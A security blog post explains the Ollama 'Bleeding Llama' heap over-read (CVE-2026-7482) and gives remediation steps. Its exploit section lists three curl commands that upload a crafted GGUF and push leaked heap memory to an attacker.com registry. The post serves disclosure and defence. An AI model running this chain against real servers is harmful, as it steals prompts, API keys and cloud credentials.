Bleeding Llama: Ollama's "Heartbleed Moment" and What It Means for Self-Hosted AI

How a missing bounds check in a GGUF parser lets attackers silently siphon secrets from 300,000 exposed servers — and why this should change how you think about local AI infrastructure.

The Short Version

CVE-2026-7482, nicknamed "Bleeding Llama," is an unauthenticated heap out-of-bounds read in Ollama's GGUF model loader. An attacker can exfiltrate heap memory from the process of any internet-facing Ollama server using three API calls. No credentials required. No error logs generated.

The leaked data includes user prompts, system prompts, API keys, cloud credentials, and environment variables.

Approximately 300,000 Ollama servers are exposed on the public internet right now. If yours is one of them and you haven't patched, assume compromise. Rotate every secret that touched that server.

Why "Heartbleed for AI" Isn't Hyperbole

In 2014, Heartbleed (CVE-2014-0160) shocked the industry — a simple missing bounds check in OpenSSL let attackers read server memory, leaking private keys, session tokens, and user data at scale. The vulnerability was trivial to exploit, silent, and affected an estimated 500,000 servers.

Bleeding Llama is the same pattern, replayed in the AI inference layer:

Heartbleed (2014)	Bleeding Llama (2026)
OpenSSL TLS extension	Ollama GGUF model loader
Missing bounds check on heartbeat length	Missing bounds check on tensor shape
Read past buffer into heap memory	Read past buffer into heap memory
Exfiltrate via malformed TLS response	Exfiltrate via model push to attacker registry
~500K servers exposed	~300K servers exposed

The parallels are striking — and the lesson is the same: memory safety bugs in widely deployed infrastructure have catastrophic tail risk.

How the Attack Works

Understanding the attack requires a quick detour into how Ollama handles model files.

GGUF: The Model File Format

GGUF (GPT-Generated Unified Format) is the standard for storing LLM weights efficiently. A GGUF file contains:

Header — metadata including tensor count, format version
Tensor descriptors — each tensor's name, shape (dimensions), data type, and offset
Tensor data — the actual weights
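
To make the layout concrete, here is a minimal Python sketch that reads only the fixed-size header. It assumes the published GGUF layout for version 2 and later (a 4-byte magic, a 32-bit version, then 64-bit tensor and metadata counts, all little-endian). The function name and the synthetic sample bytes are illustrative, not taken from Ollama.

```python
import struct

GGUF_MAGIC = b"GGUF"
# Assumed layout (GGUF v2+), little-endian, no padding:
# 4-byte magic, uint32 version, uint64 tensor count, uint64 metadata key/value count.
HEADER = struct.Struct("<4sIQQ")


def parse_gguf_header(data: bytes) -> dict:
    """Parse the fixed-size GGUF header and return its fields."""
    if len(data) < HEADER.size:
        raise ValueError("file too short to contain a GGUF header")
    magic, version, tensor_count, kv_count = HEADER.unpack_from(data, 0)
    if magic != GGUF_MAGIC:
        raise ValueError("not a GGUF file")
    return {
        "version": version,
        "tensor_count": tensor_count,
        "metadata_kv_count": kv_count,
    }


# Synthetic header built for illustration only (version 3, 2 tensors, 5 metadata entries).
sample = HEADER.pack(GGUF_MAGIC, 3, 2, 5)
print(parse_gguf_header(sample))
```

Every value returned here comes straight from the file, which is why the parser has to treat it as untrusted input.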

The shape field matters here. A tensor with shape (3, 3, 3) contains 27 elements. Ollama multiplies the dimensions to calculate how many elements to read.
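
The element-count arithmetic is simple enough to sketch in a few lines of Python. The helper names and the small type table below are illustrative assumptions. Only the product-of-dimensions rule comes from the text above.

```python
import math

# Bytes per element for the two tensor types discussed in this article.
BYTES_PER_ELEMENT = {"F16": 2, "F32": 4}


def element_count(shape):
    """Number of elements implied by a tensor shape (product of its dimensions)."""
    return math.prod(shape)


def declared_bytes(shape, dtype):
    """Number of bytes a reader will expect for a tensor of this shape and type."""
    return element_count(shape) * BYTES_PER_ELEMENT[dtype]


print(element_count((3, 3, 3)))          # 27
print(declared_bytes((3, 3, 3), "F16"))  # 54
```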

The Bug

When you create a model via Ollama's /api/create endpoint with a GGUF file, Ollama parses the tensor descriptors and reads tensor data based on the declared shape — not the actual file size.

Here's the vulnerable path:

/api/create → convertModelFromFiles → createModel → quantization → WriteTo → ConvertToF32

In ConvertToF32, Ollama calls:

ggml_fp16_to_fp32_row(src_ptr, output_buffer, tensor.Elements())

Where tensor.Elements() comes directly from the GGUF file's shape field. If an attacker crafts a GGUF whose shape declares 1 million F16 elements (about 2 MB at 2 bytes each) but provides only 1 KB of actual data, Ollama happily reads roughly 2 MB starting at that buffer, almost all of it adjacent heap memory.

And because Ollama uses Go's unsafe package for these low-level operations, the usual memory safety guarantees don't apply. No panic. No crash. Just silent data theft.
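
The missing check is easy to state: the bytes implied by the declared shape must fit inside the data that was actually supplied. The Python sketch below illustrates that rule. It is not Ollama's actual patch, and the function name and parameters are hypothetical.

```python
import math


def check_tensor_bounds(shape, bytes_per_element, offset, data_len):
    """Return the tensor's byte size, or raise ValueError if it would run past the data.

    Hypothetical helper: `offset` is where the tensor starts within the data
    section and `data_len` is how many bytes that section really contains.
    """
    if any(dim < 0 for dim in shape):
        raise ValueError("negative dimension in tensor shape")
    needed = math.prod(shape) * bytes_per_element
    available = data_len - offset
    if offset < 0 or available < 0 or needed > available:
        raise ValueError(
            f"tensor declares {needed} bytes but only {max(available, 0)} are available"
        )
    return needed


# A 512 x 512 F16 tensor declared over a 1024-byte payload is rejected.
try:
    check_tensor_bounds((512, 512), 2, 0, 1024)
except ValueError as err:
    print("rejected:", err)
```

Python integers do not overflow. An equivalent check in Go or C would also need to guard the multiplication itself against integer overflow.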

Keeping the Data Readable

Most quantization formats are lossy — converting between precisions corrupts the leaked bytes. The attacker bypasses this by:

Setting tensor type to F16
Requesting F32 as target format

F16 → F32 is lossless (2 bytes to 4 bytes, no precision loss). The heap data arrives intact on the attacker's server.
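
The lossless property can be checked exhaustively, since there are only 65,536 half-precision bit patterns. The sketch below uses Python's struct module as a stand-in for the real conversion routine, which is an assumption made for illustration. NaN patterns are skipped because this Python round trip does not guarantee that their payload bits survive.

```python
import struct


def f16_bits_to_f32_bytes(bits: int) -> bytes:
    """Widen one half-precision value (given as a 16-bit pattern) to 4 float32 bytes."""
    (value,) = struct.unpack("<e", bits.to_bytes(2, "little"))
    return struct.pack("<f", value)


def f32_bytes_to_f16_bits(raw: bytes) -> int:
    """Narrow 4 float32 bytes back to a 16-bit half-precision pattern."""
    (value,) = struct.unpack("<f", raw)
    return int.from_bytes(struct.pack("<e", value), "little")


def is_nan_pattern(bits: int) -> bool:
    """True if the 16-bit pattern encodes a NaN (all-ones exponent, non-zero mantissa)."""
    return (bits & 0x7C00) == 0x7C00 and (bits & 0x03FF) != 0


# Round-trip every non-NaN pattern and collect any that fail to come back unchanged.
mismatches = [
    bits
    for bits in range(0x10000)
    if not is_nan_pattern(bits)
    and f32_bytes_to_f16_bits(f16_bits_to_f32_bytes(bits)) != bits
]
print(len(mismatches))  # 0
```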

The Three-Call Exploit Chain

Step 1: Upload the payload

curl -X POST http://target:11434/api/blobs/sha256:$(sha256sum malicious.gguf | cut -d' ' -f1) \
  --data-binary @malicious.gguf

Step 2: Trigger the memory leak

curl -X POST http://target:11434/api/create \
  -d '{"model": "http://attacker.com/stolen/model:tag", "files": {"model": "malicious.gguf"}, "quantize": "f32"}'

Step 3: Exfiltrate

curl -X POST http://target:11434/api/push \
  -d '{"model": "http://attacker.com/stolen/model:tag"}'

The model — now containing heap memory — gets pushed to the attacker's registry. Reversing the quantization reveals:

User prompts from other sessions
System prompts from other models on the same server
Environment variables (often containing API keys, database credentials, cloud secrets)
Fragments of tool outputs if Ollama is connected to coding assistants

All captured silently. No error logs. No crashes.

Why 300,000 Servers Are Exposed

Ollama binds to 127.0.0.1 by default — safe if you're running it locally. But the common OLLAMA_HOST=0.0.0.0 setting opens it to all interfaces.

The problem: Ollama's REST API has no authentication. Zero. The /api/create, /api/push, and /api/blobs endpoints that enable this attack are completely open by default.

This isn't a misconfiguration — it's the documented behavior. Ollama was designed for local use. The community scaled it to production infrastructure without adding the auth layer that production requires.
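
A quick way to audit a configuration is to classify the OLLAMA_HOST value as loopback or not. The Python sketch below is one way to do that. The function name is hypothetical, and the accepted input forms (a bare host, host:port, or a full URL) are an assumption about how the variable is commonly written. Anything the helper cannot classify is flagged conservatively.

```python
import ipaddress
from urllib.parse import urlsplit


def binds_beyond_loopback(ollama_host: str) -> bool:
    """Return True if the given OLLAMA_HOST value would listen beyond loopback."""
    value = ollama_host.strip()
    if not value:
        return False  # unset: the default described above is 127.0.0.1
    if "://" not in value:
        value = "//" + value  # lets urlsplit parse a bare host or host:port
    host = urlsplit(value).hostname
    if host is None:
        return True  # no recognizable host: flag for manual review
    if host == "localhost":
        return False
    try:
        return not ipaddress.ip_address(host).is_loopback
    except ValueError:
        return True  # a hostname we cannot classify: flag it conservatively


for candidate in ("127.0.0.1:11434", "0.0.0.0", "http://0.0.0.0:11434", "[::1]:11434"):
    print(candidate, binds_beyond_loopback(candidate))
```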

The Disclosure Timeline Made It Worse

Feb 25, 2026: Patch shipped in v0.17.1
Feb 25, 2026: Release notes did not flag it as a security fix
May 1, 2026: CVE finally published

That's a 65-day window where a critical vulnerability was patched but invisible to scanners, security tools, and patch management systems. Operators running vulnerable versions had no signal to prioritize the update.

This is a systemic problem. MITRE's CVE assignment backlog (2+ months in this case) creates dangerous gaps between patch availability and operator awareness. The researcher escalated to Echo, a third-party CNA, to finally get the CVE published.

What's Actually in Heap Memory?

The heap persists across requests, accumulating data from everything the Ollama process has touched since its last restart:

User prompts — every question asked of every model
System prompts — often containing proprietary instructions, personas, or confidential context
Environment variables — API keys, database URLs, cloud credentials
Tool outputs — if you've connected Ollama to Claude Code, Cursor, or similar tools, their outputs flow through the heap

In an enterprise setting where Ollama serves thousands of employees, the heap becomes a treasure trove. Attacker motivation is high.

The Broader Pattern: AI Infrastructure Has the Security Posture of 2005

Bleeding Llama isn't an isolated incident. The self-hosted AI ecosystem is repeating mistakes we solved in web infrastructure decades ago:

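Default configurations are dangerous once exposed. Ollama binds to 127.0.0.1 by default, but it ships with no auth, and the common OLLAMA_HOST=0.0.0.0 setting opens it to all interfaces. This is fine for a developer's laptop and catastrophic for a shared server.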

No auth by default. The REST API trusts all callers implicitly. Compare that to a networked database such as PostgreSQL, where remote clients must be explicitly allowed and authenticated before they can connect.

File format parsers are trust boundaries. GGUF files can come from anywhere. Treating their metadata as trustworthy is the same class of mistake that gave us image parsing RCEs, PDF exploits, and font rendering vulnerabilities.

"Local-first" doesn't mean "local-only." Tools designed for local use get deployed to production. The assumption that the caller is benign doesn't survive contact with the internet.

Remediation Checklist

Immediate (do this now)

Update to Ollama v0.17.1+

ollama --version
# If < 0.17.1, update immediately
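
When checking many hosts, compare versions numerically rather than as strings, because "0.9.6" sorts after "0.17.1" in a plain string comparison. The Python sketch below shows one way to do it. The helper names are hypothetical, and the sample output string passed in the last call is an assumption about what the CLI prints.

```python
import re

PATCHED = (0, 17, 1)  # first fixed release according to this article


def parse_version(text: str) -> tuple:
    """Extract the first MAJOR.MINOR.PATCH triple found in the text."""
    match = re.search(r"(\d+)\.(\d+)\.(\d+)", text)
    if match is None:
        raise ValueError(f"no version number found in {text!r}")
    return tuple(int(part) for part in match.groups())


def is_patched(version_output: str) -> bool:
    """True if the reported version is at least the patched release.

    Pre-release suffixes such as "-rc1" are ignored by this sketch.
    """
    return parse_version(version_output) >= PATCHED


print(is_patched("0.17.0"))                    # False
print(is_patched("0.9.6"))                     # False
print(is_patched("ollama version is 0.18.2"))  # True
```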

Audit all Ollama instances
- Check for OLLAMA_HOST=0.0.0.0 in configs
- Scan for port 11434 exposed to untrusted networks

If your instance was internet-accessible before patching:
- Assume compromise
- Rotate ALL secrets: API keys, database credentials, cloud tokens
- Review logs for suspicious /api/create or /api/push activity
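
For the log review, a simple filter over access-log lines is often enough for a first pass. The Python sketch below treats each line as plain text and keeps POST requests to the two endpoints named above. The sample lines are invented for illustration and do not reproduce Ollama's or any proxy's actual log format.

```python
import re

# Match a POST to /api/create or /api/push, but not longer paths such as /api/pushes.
WATCHED = re.compile(r"\bPOST\b.*?(/api/create|/api/push)(?![\w/-])")


def suspicious_lines(lines):
    """Return the log lines that record a POST to a watched endpoint."""
    return [line for line in lines if WATCHED.search(line)]


# Invented sample lines; adapt the pattern to the real log format in use.
sample_log = [
    "203.0.113.7 POST /api/create 200",
    "127.0.0.1 POST /api/generate 200",
    "203.0.113.7 POST /api/push 200",
    "127.0.0.1 GET /api/tags 200",
]

for hit in suspicious_lines(sample_log):
    print(hit)
```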

Hardening (do this next)

Bind to localhost only — Remove OLLAMA_HOST=0.0.0.0 from production unless strictly required
Deploy an auth proxy — Put nginx, Caddy, or an API gateway with authentication in front of Ollama
Network segmentation — Ollama should not be reachable from the internet or untrusted network segments
Don't pass secrets as env vars — If Ollama doesn't need the credential, don't give it to the process
Monitor the endpoints — Alert on /api/create and /api/push calls, especially those referencing external registries
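
The monitoring item can be backed by a small allowlist check on the model reference in each request. The Python sketch below is one possible heuristic. The function names, the allowlisted host, and the rule that a first path component containing a dot or colon is a registry host are all assumptions made for illustration.

```python
from urllib.parse import urlsplit


def registry_host(model_ref: str):
    """Return the registry host named in a model reference, or None if there is none."""
    if "://" in model_ref:
        return urlsplit(model_ref).hostname
    first, sep, _rest = model_ref.partition("/")
    # Heuristic: the first path component is a host only if it looks like one.
    if sep and ("." in first or ":" in first or first == "localhost"):
        return urlsplit("//" + first).hostname
    return None


def is_external(model_ref: str, allowed_hosts) -> bool:
    """True if the reference names a registry host that is not on the allowlist."""
    host = registry_host(model_ref)
    return host is not None and host not in allowed_hosts


ALLOWED = {"registry.internal.example"}  # hypothetical internal registry
print(is_external("http://attacker.com/stolen/model:tag", ALLOWED))            # True
print(is_external("registry.internal.example:5000/team/model:tag", ALLOWED))  # False
print(is_external("llama3:8b", ALLOWED))                                       # False
```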

For Windows Users

Two additional unpatched vulnerabilities affect Ollama for Windows (v0.12.10 through v0.17.5):

CVE-2026-42248: Missing signature verification on updates
CVE-2026-42249: Path traversal in the updater

Disable automatic updates and remove the Startup folder shortcut until patches ship.

The Meta-Lesson

Every new infrastructure layer recapitulates the security history of the layers beneath it. Containers repeated VM escape bugs. Kubernetes repeated container isolation bugs. LLM inference engines are now repeating memory safety bugs.

The optimistic read: we know how to fix this. Bounds checking, authentication, principle of least privilege, secure defaults — none of this is novel. The tooling exists.

The pessimistic read: we keep not doing it. Speed-to-market pressures, "it's just for local use," and the assumption that open-source scrutiny will catch bugs all contribute to a posture where critical infrastructure ships without basic security controls.

Bleeding Llama is Ollama's wake-up call. The question is whether the broader self-hosted AI ecosystem learns from it, or waits for the next CVSS 9.1 vulnerability to find out what was in its heap memory.

If you're running Ollama in production: patch now, rotate secrets, and add that auth proxy you've been putting off. The patch has been available since February. The CVE has been public for weeks. The exploit is trivial. There's no excuse left.

Sources: Cyera Research (original disclosure), Indusface, The Hacker News, NVD. CVE-2026-7482 assigned by Echo CNA (April 2026).

Sumeet Zankar